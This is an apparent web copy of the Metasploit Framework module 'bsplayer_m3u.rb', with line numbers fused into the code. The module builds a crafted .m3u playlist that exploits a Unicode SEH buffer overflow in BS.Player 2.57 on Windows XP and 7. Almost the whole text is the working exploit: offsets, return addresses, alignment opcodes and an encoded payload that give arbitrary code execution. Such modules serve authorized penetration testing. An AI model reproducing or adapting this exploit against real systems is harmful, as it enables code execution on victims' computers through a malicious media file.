CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/fileformat/bsplayer_m3u.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::FILEFORMAT9include Msf::Exploit::Seh1011def initialize(info = {})12super(update_info(info,13'Name' => 'BS.Player 2.57 Buffer Overflow (Unicode SEH)',14'Description' => %q{15This module exploits a buffer overflow in BS.Player 2.57. When16the playlist import is used to import a specially crafted m3u file,17a buffer overflow occurs allowing arbitrary code execution.18},19'License' => MSF_LICENSE,20'Author' =>21[22'C4SS!0 G0M3S ', # Original Exploit23'Chris Gabriel', # MSF Module24#Greets: Corelan team for mona.py & awesome tutorials25],26'References' =>27[28[ 'OSVDB', '82528' ],29[ 'EDB', '15934' ]30],31'DefaultOptions' =>32{33'EXITFUNC' => 'process',34#'InitialAutoRunScript' => 'migrate -f',35},36'Platform' => 'win',37'Payload' =>38{39'Space' => 2000,40'BadChars' => "\x00\x0a\x0d\x1a\x80",41'DisableNops' => true,42'StackAdjustment' => -3500,43},4445'Targets' =>46[47[ 'Windows XP',48{49# pop ecx # pop ebp # ret 0c50# ASLR: False, Rebase: False, SafeSEH: False51# v2.5.7.1051 (bsplayer.exe)52'Ret' => "\x2f\x49",53'Offset' => 4102,54'Padding' => 187955}56],57[ 'Windows 7',58{59# pop ecx # pop ebp # ret 0c60# ASLR: False, Rebase: False, SafeSEH: False61# v2.5.7.1051 (bsplayer.exe)62'Ret' => "\x2f\x49",63'Offset' => 4102,64'Padding' => 193165}66],67],68'Privileged' => false,69'DisclosureDate' => '2010-01-07',70'DefaultTarget' => 0))7172register_options(73[74OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']),75])7677end7879def exploit8081nseh = "\x61\x42"8283align = ''84align << "\x58" # POP EAX85align << "\x6d" # PAD86align << "\x58" # POP EAX87align << "\x6d" # PAD88align << "\x58" # POP EAX89align << "\x6d" # PAD90align << "\x58" # POP EAX91align << "\x6d" # PAD92align << "\x58" # POP EAX93align << "\x6d" # PAD94align << "\x58" # POP EAX95align << "\x6d" # PAD96align << "\x58" # POP EAX97align << "\x6d" # PAD98align << "\x58" # POP EAX99align << "\x6d" # PAD100align << "\x58" # POP EAX101align << "\x6d" # PAD102align << "\x58" # POP EAX103align << "\x6d" # PAD104align << "\x58" # POP EAX105align << "\x6d" # PAD106align << "\x58" # POP EAX107align << "\x6d" # PAD108align << "\x58" # POP EAX109align << "\x6d" # PAD110align << "\x50" # PUSH EAX111align << "\x6d" # PAD112align << "\xc3" # RET113114enc = framework.encoders.create('x86/unicode_mixed')115register_to_align_to = "EAX"116enc.datastore.import_options_from_hash({ 'BufferRegister' => register_to_align_to })117unicodepayload = enc.encode(payload.encoded, nil, nil, platform)118119padding = rand_text_alpha_lower(target['Padding'])120121buffer = "http://"122buffer << rand_text_alpha_lower(target['Offset'])123buffer << nseh124buffer << target['Ret']125buffer << align126buffer << padding127buffer << unicodepayload128129file_create(buffer)130131end132end133134135